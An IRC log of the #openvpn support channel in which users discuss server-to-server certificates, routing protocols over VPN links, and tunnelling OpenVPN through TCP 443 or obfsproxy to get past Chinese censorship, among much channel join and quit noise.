fix for the installer? 04:58 <@dazo> djc: that's something like that I believe the Android and iOS implementation looks like .... 
library oriented 04:59 <@dazo> djc: mattock releases new installers independently of OpenVPN now ... so he'll fix that as soon as he got a time slot ... that's the good thing about the split-up we did in 2.3 05:00 <@dazo> djc: in regards to netlink sockets support ... well, we have a lot of things on the TODO list ... but all of us are loaded with real work as well, so we tend to scratch our own itches these days 05:01 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 246 seconds] 05:01 <@dazo> djc: having that said ... many of us will go to FOSDEM this year again, and rumour goes that even James Yonan will come too 05:02 < djc> man, I regret not going to FOSDEM more every day :) 05:02 <@dazo> djc: you should regret that! ;-) 05:02 < djc> yeah, well, I'm going skiing next week :P 05:02 <@dazo> (it's never too late to turn) 05:02 <@dazo> heh 05:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 05:28 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 06:07 -!- master_of_master [~master_of@p57B540A0.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:43 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 248 seconds] 06:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 07:00 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 07:05 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Ping timeout: 255 seconds] 07:06 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 07:08 -!- dazo is now known as dazo_afk 07:11 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 07:54 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has joined #openvpn 07:55 < Eagleman> I want to make a vpn connection between 2 servers, Can this be done with the 2 server certificates or does 1 server need client certificates to connect to the other server? 07:58 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Read error: Connection reset by peer] 08:03 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 08:04 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has quit [] 08:06 -!- djc [~djc@gentoo/developer/djc] has left #openvpn [] 08:08 -!- batrick [~batrick@nmap/developer/batrick] has quit [Ping timeout: 272 seconds] 08:22 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has joined #openvpn 08:22 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has quit [Changing host] 08:22 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 08:34 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 08:34 -!- MariusIT [~userit@86.120.191.55] has left #openvpn [] 08:56 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 08:58 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:16 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has joined #openvpn 09:17 < Eagleman> I want to make a vpn connection between 2 servers, Can this be done with the 2 server certificates or does 1 server need client certificates to connect to the other server? 
09:27 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 256 seconds] 09:28 -!- ch1mkey [ch1m@ns203993.ovh.net] has left #openvpn [] 09:29 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 09:40 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 256 seconds] 09:40 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 09:40 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 09:40 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 09:40 -!- mode/#openvpn [+o krzee] by ChanServ 09:41 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has joined #openvpn 09:41 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has quit [Changing host] 09:41 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 09:42 <@krzee> !learn krzee location: moon base where he smokes moonajuana 09:42 <@vpnHelper> (learn [] as ) -- Associates with . is only necessary if the message isn't sent on the channel itself. The word 'as' is necessary to separate the key from the value. It can be changed to another word via the learnSeparator registry value. 09:42 <@krzee> !learn krzee as location: moon base where he smokes moonajuana 09:42 <@vpnHelper> Joo got it. 09:42 < Eagleman> I want to make a vpn connection between 2 servers, Can this be done with the 2 server certificates or does 1 server need client certificates to connect to the other server? 09:43 < rob0> krzee, I'll be thinking of you at 4:20 09:43 <@krzee> i feel honored 09:43 <@krzee> Eagleman, if they were signed by the same CA, 2 server certs will work 09:43 < rob0> Eagleman, did you try it? Did it work? 
09:44 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 09:44 <@krzee> in fact each can check the other was signed as a server too 09:44 <@krzee> and that ^ 09:44 < Eagleman> client-server did work, haven't been able to test server-server 09:45 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds] 09:46 -!- xe` [~xe@annex.yi.org] has left #openvpn ["Leaving"] 09:47 < Eagleman> ok it seems to work 09:48 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 246 seconds] 09:48 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 09:52 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 245 seconds] 09:57 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 09:58 -!- dazo_afk is now known as dazo 10:00 < Eagleman> Aaand i was wrong: error=unsupported certificate purpose 10:01 < Eagleman> connecting to an openvpn server with a server certificate 10:02 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 252 seconds] 10:03 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 10:04 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 10:05 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has joined #openvpn 10:05 -!- _polto_ [~polto@adslgva0879.worldcom.ch] has quit [Changing host] 10:05 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 10:09 <@krzee> !route 10:09 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 10:09 <@krzee> !whybridge 10:09 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 10:11 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has quit [] 10:11 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 10:15 -!- u0m3_ [~Radu@92.80.113.12] has quit [Read error: Connection reset by peer] 10:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 10:18 -!- u0m3 [~Radu@109.96.140.34] has joined #openvpn 10:20 <@krzee> !book 10:20 <@vpnHelper> "book" is http://www.packtpub.com/openvpn-2-cookbook/book check out JJK's awesome cookbook for openvpn 2! 10:28 <@krzee> !confgen 10:28 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 10:33 -!- brute11k [~brute11k@89.249.231.95] has joined #openvpn 10:37 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:41 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 10:43 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 256 seconds] 10:49 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 248 seconds] 10:50 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 256 seconds] 10:50 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 252 seconds] 10:53 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 10:57 -!- tMobile4a03 is now known as tyteen4a03 11:04 -!- bisko [~bisko@77.70.26.115] has quit [Quit: Computer has gone to sleep.] 
11:04 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 11:04 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 11:04 -!- raidz_away is now known as raidz 11:04 -!- raidz [~raidz@raidz.im] has quit [Changing host] 11:04 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:05 -!- mode/#openvpn [+o raidz] by ChanServ 11:05 -!- mattock_afk is now known as mattock 11:05 -!- mattock [~mattock@raidz.im] has quit [Changing host] 11:05 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 11:05 -!- mode/#openvpn [+o mattock] by ChanServ 11:05 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 11:06 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 255 seconds] 11:07 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:07 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Client Quit] 11:08 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:08 -!- mode/#openvpn [+o raidz] by ChanServ 11:27 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 11:31 <@krzee> !tcpip 11:31 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 11:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 11:33 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 11:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 11:47 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 276 seconds] 11:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:00 -!- chovy [~ettinger@108-194-42-92.lightspeed.mtryca.sbcglobal.net] has left #openvpn [] 12:14 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 276 seconds] 12:14 -!- black_ [black@got.laid.using.blackmajic.org] has joined #openvpn 12:28 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has 
quit [Ping timeout: 245 seconds] 12:30 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 12:30 -!- zz_AsadH is now known as AsadH 12:30 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 12:30 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 12:54 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Ping timeout: 248 seconds] 13:10 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds] 13:15 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 13:15 -!- zz_AsadH is now known as AsadH 13:15 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 13:15 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 13:18 -!- mdw- [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Read error: Operation timed out] 13:36 -!- gardar_ [~gardar@gardar.net] has joined #openvpn 13:42 -!- Netsplit *.net <-> *.split quits: gardar 13:48 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 14:00 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Read error: Connection reset by peer] 14:01 -!- raidz_ [~raidz@raidz.im] has joined #openvpn 14:01 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 255 seconds] 14:01 -!- raidz_ is now known as raidz 14:01 -!- raidz [~raidz@raidz.im] has quit [Changing host] 14:01 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 14:01 -!- mode/#openvpn [+o raidz] by ChanServ 14:06 -!- vpopov [~happylife@149.62.17.217] has quit [Read error: Operation timed out] 14:16 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 14:16 -!- mode/#openvpn [+o mattock] by ChanServ 14:20 -!- mute [mute@clt.scottn.us] has joined #openvpn 14:20 -!- SpookZA [~SpookZA@197.87.53.234] has joined #openvpn 14:25 -!- mute [mute@clt.scottn.us] has left #openvpn [] 14:26 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has joined #openvpn 14:26 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has quit [Changing host] 14:26 -!- _polto_ 
[~polto@fsf/member/polto] has joined #openvpn 14:32 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 14:34 <@ecrist> bitch 14:34 <@ecrist> boats and hos even 14:35 -!- Irssi: #openvpn: Total of 170 nicks [6 ops, 0 halfops, 3 voices, 161 normal] 14:36 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has joined #openvpn 14:54 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 244 seconds] 14:59 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has joined #openvpn 14:59 -!- _polto_ [~polto@105-233.197-178.cust.bluewin.ch] has quit [Changing host] 14:59 -!- _polto_ [~polto@fsf/member/polto] has joined #openvpn 15:10 -!- brute11k [~brute11k@89.249.231.95] has quit [Quit: Leaving.] 15:14 -!- brute11k [~brute11k@89.249.231.95] has joined #openvpn 15:17 -!- brute11k [~brute11k@89.249.231.95] has quit [Client Quit] 15:20 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 252 seconds] 15:27 -!- rkantos [robin@4e.fi] has joined #openvpn 15:30 -!- rkantos_ [robin@4e.fi] has joined #openvpn 15:30 -!- rkantos_ [robin@4e.fi] has quit [Client Quit] 15:33 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 246 seconds] 15:33 -!- _polto_ [~polto@fsf/member/polto] has quit [Ping timeout: 276 seconds] 15:34 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 15:46 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 15:50 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- \o/] 15:50 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 15:52 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 276 seconds] 15:56 -!- dazo is now known as dazo_afk 15:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds] 15:57 -!- rkantos [robin@4e.fi] has joined #openvpn 16:00 -!- bisko [~bisko@178.254.232.159] has quit [Ping timeout: 255 seconds] 16:02 -!- JPeterson 
[~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Read error: Connection reset by peer] 16:02 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 16:04 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 16:07 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 252 seconds] 16:14 -!- rkantos [robin@4e.fi] has joined #openvpn 16:14 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 16:18 -!- mbrit [~mbrit@186.120.97.194] has quit [Read error: Connection reset by peer] 16:21 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 16:30 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:35 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 16:35 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 276 seconds] 16:37 -!- BtbN [~btbn@btbn.de] has joined #openvpn 16:38 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 16:42 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 16:43 -!- zz_AsadH is now known as AsadH 16:43 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 16:43 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 16:50 -!- k1ng [~k1ng@76.73.57.172] has joined #openvpn 16:50 -!- k1ng [~k1ng@76.73.57.172] has quit [Changing host] 16:50 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 16:57 -!- bisko [~bisko@178.254.232.159] has quit [Quit: Computer has gone to sleep.] 17:01 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 17:19 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:20 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:43 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Quit: ZNC - http://znc.in] 17:43 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 
17:44 -!- raidz [~raidz@raidz.im] has joined #openvpn 17:44 -!- raidz [~raidz@raidz.im] has quit [Changing host] 17:44 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:44 -!- mode/#openvpn [+o raidz] by ChanServ 17:45 -!- mattock [~mattock@raidz.im] has joined #openvpn 17:45 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:45 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:45 -!- mode/#openvpn [+o mattock] by ChanServ 17:50 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 17:50 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Client Quit] 17:50 -!- raidz [~raidz@raidz.im] has joined #openvpn 17:50 -!- raidz [~raidz@raidz.im] has quit [Changing host] 17:50 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:50 -!- mode/#openvpn [+o raidz] by ChanServ 17:51 -!- mattock [~mattock@raidz.im] has joined #openvpn 17:51 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:51 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:51 -!- mode/#openvpn [+o mattock] by ChanServ 18:22 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds] 18:31 -!- rkantos [robin@4e.fi] has joined #openvpn 18:58 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 240 seconds] 19:01 -!- rkantos [~Name@4e.fi] has joined #openvpn 19:08 -!- raidz is now known as raidz_away 19:09 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 19:14 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 19:16 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:17 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 19:31 -!- dmz [~dmz@unaffiliated/dmz] has joined #openvpn 19:32 < dmz> anyone ever used openvpn just for a network connection w/no route details on either side, just a simple p2p connection and then used bgp or other protocol to handle routing; we have multiple sites and the routing is getting dicey 19:33 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:50 -!- mode/#openvpn [+o krzee] by ChanServ 20:10 -!- rkantos [~Name@4e.fi] has quit [Ping timeout: 276 seconds] 20:17 -!- rkantos [robin@4e.fi] has joined #openvpn 20:19 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 20:32 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 20:49 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Read error: Connection reset by peer] 21:17 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 256 seconds] 21:32 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 21:32 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 21:37 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 22:25 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Quit: Leaving] 22:34 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:50 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 23:07 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 240 seconds] 23:15 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 23:19 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 23:19 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 23:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 23:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 23:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:24 -!- mode/#openvpn [+o krzee] by ChanServ --- Day changed Sat Jan 26 2013 00:08 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 00:14 -!- brute11k [~brute11k@89.249.235.94] has quit 
[Read error: Connection reset by peer] 00:15 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 00:18 -!- brute11k [~brute11k@89.249.235.94] has quit [Client Quit] 00:22 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 00:27 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds] 01:08 -!- mattock is now known as mattock_afk 01:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 01:34 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 01:42 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 01:43 -!- brute11k [~brute11k@89.249.235.94] has quit [Client Quit] 01:47 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 01:49 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:49 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:49 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:49 -!- mode/#openvpn [+o krzee] by ChanServ 01:57 -!- brute11k [~brute11k@89.249.235.94] has quit [Quit: Leaving.] 02:01 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 02:07 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 02:09 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 02:10 -!- brute11k [~brute11k@89.249.235.94] has quit [Client Quit] 02:18 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 
02:28 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 252 seconds]
02:40 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
02:53 -!- bisko [~bisko@178.254.232.159] has joined #openvpn
03:20 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn
03:39 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
03:42 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has joined #openvpn
03:43 < pppingme> dmz yep, and I use ospf
03:47 < SpookZA> me too
03:47 < SpookZA> pppingme ... do you have multiple paths or is it pure hub and spoke?
03:49 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
03:54 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer]
03:56 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn
04:02 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
04:03 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer]
04:03 -!- Devastator [~devas@186.214.111.217] has joined #openvpn
04:05 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Ping timeout: 245 seconds]
04:08 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn
04:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
04:15 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has joined #openvpn
04:15 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has quit [Changing host]
04:15 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
04:31 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer]
04:34 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn
05:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
05:22 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn
05:27 -!- bisko [~bisko@178.254.232.159] has quit [Ping timeout: 252 seconds]
05:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
05:30 < Eagleman> Its not possible to connect to a server with a server certificate?
06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
06:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:22 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer]
06:23 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds]
06:23 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
06:25 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn
06:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
06:25 -!- BtbN [~btbn@btbn.de] has joined #openvpn
06:28 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn
06:30 -!- ak5_ [~ak5@unaffiliated/ak5] has joined #openvpn
06:31 < ak5_> hi everyone, I am trying to create a small vpn to access the web securely in China. I wanted to ask if I can use openvpn via https?
06:40 < Eagleman> Yes you can, use tcp and port 443
06:56 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
07:08 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 256 seconds]
07:10 < ak5_> Eagleman: thanks a lot. Can I also use tlspsk?
07:19 -!- lbft [~lbft@199.195.249.177] has joined #openvpn
07:33 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
07:56 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn
08:03 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds]
08:05 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
08:40 < kisom> ak5_: It depends on what ISP you use in china
08:40 <+hazardous> you may need to use obfsproxy too
08:41 < ak5_> Isee
08:41 <+hazardous> !obfs
08:41 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation
08:41 < ak5_> kisom: how does this differ between ISPs in china?
08:41 < ak5_> !tlsspk
08:41 < ak5_> :(
08:41 < ak5_> still found no documentation for this, besides the spec
08:42 <+hazardous> ak5_: i presume some fuck with their network a bit more
08:42 < ak5_> probably
08:43 < ak5_> and since my office is on old military grounds I get the shittiest ISP of all: that of the military
08:44 < kisom> ak5_: in my experience it does. and i get paid to make sure a certain big company have uncensored access in china :P
08:44 < ak5_> kisom: in that case, do you use openvpn?
08:45 < kisom> ak5_: We use openvpn but we've modified the code somewhat
08:45 < ak5_> kisom: I see. Do you use tlspsk and should I?
08:45 < kisom> We use port 80 and 443 mainly, and the connection really looks like either HTTP or HTTPS
08:45 < ak5_> interesting
08:46 < ak5_> these are closed source patches I take it
08:46 < ak5_> I am learning a bit about networking, I am by no means an expert
08:46 < kisom> I assume TLSPSK (by the name of it) just takes the data and encrypts it with some PSK so it looks just like random data?
08:46 < ak5_> kisom: yes
08:46 < kisom> Then it might help
08:47 < ak5_> ok, great
08:47 < kisom> also, you can ignore packets with the RST flag set
08:47 < ak5_> kisom: another question, why use http?
08:47 < kisom> The china firewall does not block anything, it just sends RST to both ends
08:47 <+hazardous> isn't some https mitm'd anyways since iirc CNNIC and a few others are root ca's
08:48 < kisom> hazardous: We use our own CA only :)
08:48 < ak5_> I would setup my own CA as well, all I have to do is mirror one, right?
08:50 < kisom> Mirror one...?
08:50 < kisom> Just create one with openssl or similar
08:51 <+hazardous> what, mirror one?
08:52 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in]
08:54 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
08:54 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection]
08:56 < ak5_> hm, I mistook CA for DNS server - like I said I am a beginner, sry
08:56 < ak5_> I know now what that is :)
08:57 < rob0> "mirror" is not a DNS term either.
08:57 < ak5_> well
08:57 < ak5_> sorry
08:57 < ak5_> :)
08:58 < ak5_> 'be slave of'?
